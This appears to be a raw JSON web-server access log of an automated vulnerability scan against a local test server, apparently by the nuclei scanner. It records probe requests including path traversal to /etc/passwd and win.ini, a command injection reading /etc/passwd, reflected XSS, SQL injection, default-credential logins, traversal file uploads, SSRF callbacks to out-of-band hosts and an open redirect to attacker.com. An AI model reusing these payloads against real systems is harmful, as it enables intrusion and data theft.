HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/29KAY5JrerLcZ8po6ltDYEkTOTa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/systemstatus_remote.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sws/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.487","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.041","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"------WebKitFormBoundaryoZ8meKnrrso89R6Y\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22; filename=\x22../../../../../../../tmp/poc\x22\x0D\x0A\x0D\x0Atest-poc\x0D\x0A------WebKitFormBoundaryoZ8meKnrrso89R6Y--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 0000000000000029KAY0frQruVX4LNnZ52nrYJ9T8\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /password_change.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:21 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/support/stores/test_grid_filter.php?query=phpinfo(); HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/login/LoginForm.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..../..../..../..../..../..../..../..../..../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"url=https://127.0.0.1:443@ca285tosmpvbafqg07h08gihs1xamo8nd.oast.fun\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) 